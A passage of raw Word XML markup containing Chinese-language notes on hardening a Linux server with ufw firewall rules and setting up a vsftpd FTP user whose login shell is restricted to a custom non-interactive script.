        <w:t>fw allow 20:21/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AF8919" w14:textId="77777777" w:rsidR="004C0D4D" w:rsidRDefault="004C0D4D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13F73A67" w14:textId="77777777" w:rsidR="002B5FCB" w:rsidRDefault="002B5FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="539CD127" w14:textId="151C22B8" w:rsidR="002B5FCB" w:rsidRDefault="002B5FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看防火墙状态：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用以下命令检查防火墙的状态，确保它已经启用：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42109E8F" w14:textId="77777777" w:rsidR="002B5FCB" w:rsidRDefault="002B5FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sudo ufw status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129FA22D" w14:textId="77777777" w:rsidR="002B5FCB" w:rsidRDefault="002B5FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="111D641A" w14:textId="77777777" w:rsidR="002B5FCB" w:rsidRDefault="002B5FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确保输出显示防火墙已经启用，并且应用了您的规则。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F96056D" w14:textId="77777777" w:rsidR="002B5FCB" w:rsidRDefault="002B5FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7231AE83" w14:textId="6D20D951" w:rsidR="002B5FCB" w:rsidRDefault="002B5FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认规则：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B5FCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>默认情况下，</w:t>
      </w:r>
      <w:r w:rsidRPr="002B5FCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">ufw </w:t>
      </w:r>
      <w:r w:rsidRPr="002B5FCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>可能允许所有连接。您可以通过以下命令将默认策略设置为拒绝所有传入连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7700C907" w14:textId="77777777" w:rsidR="002B5FCB" w:rsidRDefault="002B5FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="742D120B" w14:textId="77777777" w:rsidR="002B5FCB" w:rsidRPr="002B5FCB" w:rsidRDefault="002B5FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B5FCB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo ufw default deny incoming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001A1D9F" w14:textId="77777777" w:rsidR="002B5FCB" w:rsidRDefault="002B5FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="409D3741" w14:textId="203DEF44" w:rsidR="002B5FCB" w:rsidRDefault="002B5FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许特定端口：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ufw allow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令允许特定端口的连接。例如，如果您希望允许</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接（端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），可以运行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5D87E3" w14:textId="77777777" w:rsidR="002B5FCB" w:rsidRDefault="002B5FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sudo ufw allow 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2132F00D" w14:textId="77777777" w:rsidR="002B5FCB" w:rsidRDefault="002B5FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A2FDB5E" w14:textId="77777777" w:rsidR="002B5FCB" w:rsidRDefault="002B5FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>您可以根据您的需求添加其他规则。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FF8B46" w14:textId="77777777" w:rsidR="002B5FCB" w:rsidRDefault="002B5FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A2CBEC3" w14:textId="0310BA7B" w:rsidR="002B5FCB" w:rsidRDefault="002B5FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用规则：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确保在更改防火墙规则后应用这些规则：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519F2DE2" w14:textId="77777777" w:rsidR="002B5FCB" w:rsidRDefault="002B5FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    sudo ufw enable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B01848" w14:textId="77777777" w:rsidR="002B5FCB" w:rsidRDefault="002B5FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18A0728D" w14:textId="4E84D9C9" w:rsidR="002B5FCB" w:rsidRDefault="002B5FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5FCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>检查规则：</w:t>
      </w:r>
      <w:r w:rsidRPr="002B5FCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B5FCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>最后，再次运行</w:t>
      </w:r>
      <w:r w:rsidRPr="002B5FCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo ufw status</w:t>
      </w:r>
      <w:r w:rsidRPr="002B5FCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，确保您的规则已经应用，并只有您期望的端口是开放的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E575061" w14:textId="77777777" w:rsidR="002B5FCB" w:rsidRDefault="002B5FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D86E2A8" w14:textId="56B38C2D" w:rsidR="002B5FCB" w:rsidRDefault="002B5FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确保仅允许需要的端口，并拒绝不必要的连接，以提高系统的安全性。如果您有其他特定的端口或服务需要限制，请相应地调整防火墙规则。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C84DBA" w14:textId="77777777" w:rsidR="002B5FCB" w:rsidRDefault="002B5FCB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1395BF02" w14:textId="166A8921" w:rsidR="000939E9" w:rsidRDefault="00A11A34" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="270" w:name="_Toc159779730"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ftp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:bookmarkEnd w:id="270"/>
    </w:p>
    <w:p w14:paraId="101B848B" w14:textId="0AB87BE7" w:rsidR="008A7101" w:rsidRDefault="008A7101" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09DD8559" w14:textId="12516A8C" w:rsidR="008B1821" w:rsidRDefault="008B1821" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:r>
        <w:t>user ftpuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D6F065" w14:textId="6BDF43E6" w:rsidR="008B1821" w:rsidRDefault="008B1821" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>cho “ftpuser” | tee -a /etc/vsftpd.user_list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEB0077" w14:textId="3295E552" w:rsidR="008B1821" w:rsidRDefault="008B1821" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里如果按照上文我的操作，会有个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vsftp</w:t>
      </w:r>
      <w:r>
        <w:t>d.user_allow_list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替代此文件和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>onf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中内容的话</w:t>
      </w:r>
      <w:r w:rsidR="00BE206C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，此处不需要操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8B57C7" w14:textId="6BB330BA" w:rsidR="00BE206C" w:rsidRDefault="00BE206C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54613BB1" w14:textId="18C3A52D" w:rsidR="00BE206C" w:rsidRDefault="008879D7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="00E573E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，且禁用登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0390DF44" w14:textId="2909D3E3" w:rsidR="008A7101" w:rsidRDefault="008A7101" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7912702C" w14:textId="24A9B86F" w:rsidR="00E573E8" w:rsidRDefault="00E573E8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要创建的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ft</w:t>
      </w:r>
      <w:r>
        <w:t>puser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录，但是不能给他</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等敏感</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E154D1F" w14:textId="6EE4BA03" w:rsidR="00E573E8" w:rsidRDefault="00E573E8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50A3F381" w14:textId="65BF9EE1" w:rsidR="00E573E8" w:rsidRDefault="00CB6EF5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，这里不能给</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC447C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC447C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>usr/sbin/nologin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，否则就完全禁止</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ftpuser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录了。</w:t>
      </w:r>
      <w:r w:rsidR="00932E0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们</w:t>
      </w:r>
      <w:r w:rsidR="00932E0E" w:rsidRPr="00DC447C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>需要允许该用户登录，但是不能操作</w:t>
      </w:r>
      <w:r w:rsidR="00932E0E" w:rsidRPr="00DC447C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6856C353" w14:textId="2EF4D240" w:rsidR="00E573E8" w:rsidRDefault="00E573E8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0132BD0B" w14:textId="2441C8CB" w:rsidR="003A599C" w:rsidRDefault="003A599C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以新建</w:t>
      </w:r>
      <w:r>
        <w:t>/bin/ftponly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是不返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>h,bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等内容的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC0C9EC" w14:textId="37020E68" w:rsidR="003A599C" w:rsidRDefault="003A599C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo -e ‘#!/bin/sh\necho “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to FTP”’ | tee -a /bin/ftponly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D7C297" w14:textId="77777777" w:rsidR="003A599C" w:rsidRDefault="003A599C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F469CA5" w14:textId="245EDF4B" w:rsidR="003A599C" w:rsidRPr="005D2E88" w:rsidRDefault="003A599C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2E88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>然后限定</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2E88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ftp</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2E88">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2E88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的登录</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2E88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2E88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>为此</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2BD7FD" w14:textId="3A50F7FE" w:rsidR="00E573E8" w:rsidRDefault="003A599C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005D2E88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2E88">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sermod ftpuser -s /bin/ftponly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7909539D" w14:textId="16587912" w:rsidR="008A7101" w:rsidRDefault="008A7101" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B295DDC" w14:textId="40CACC33" w:rsidR="005D2E88" w:rsidRPr="005D2E88" w:rsidRDefault="005D2E88" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2E88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>注册</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2E88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB7CF56" w14:textId="3F089546" w:rsidR="009D21E0" w:rsidRDefault="009D21E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005D2E88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2E88">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cho “/bin/ftponly” | tee -a /etc/shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4753629D" w14:textId="64FB061D" w:rsidR="005D2E88" w:rsidRDefault="005D2E88" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A2C601D" w14:textId="1644CCDD" w:rsidR="005D2E88" w:rsidRPr="007B714B" w:rsidRDefault="005D2E88" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B714B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这里需要注意，如果不注册</w:t>
      </w:r>
      <w:r w:rsidRPr="007B714B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="007B714B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，则会导致</w:t>
      </w:r>
      <w:r w:rsidRPr="007B714B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pam</w:t>
      </w:r>
      <w:r w:rsidRPr="007B714B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.d</w:t>
      </w:r>
      <w:r w:rsidRPr="007B714B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="007B714B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:r w:rsidRPr="007B714B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>无法通过</w:t>
      </w:r>
      <w:r w:rsidRPr="007B714B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pam</w:t>
      </w:r>
      <w:r w:rsidRPr="007B714B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="007B714B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>auth</w:t>
      </w:r>
      <w:r w:rsidRPr="007B714B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>校验</w:t>
      </w:r>
      <w:r w:rsidR="00211D9E" w:rsidRPr="007B714B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，会导致</w:t>
      </w:r>
      <w:r w:rsidR="00211D9E" w:rsidRPr="007B714B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00211D9E" w:rsidRPr="007B714B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>03</w:t>
      </w:r>
      <w:r w:rsidR="00211D9E" w:rsidRPr="007B714B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>报错</w:t>
      </w:r>
      <w:r w:rsidR="00734516">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。这里</w:t>
      </w:r>
      <w:r w:rsidR="00734516">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ftpuser</w:t>
      </w:r>
      <w:r w:rsidR="00734516">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
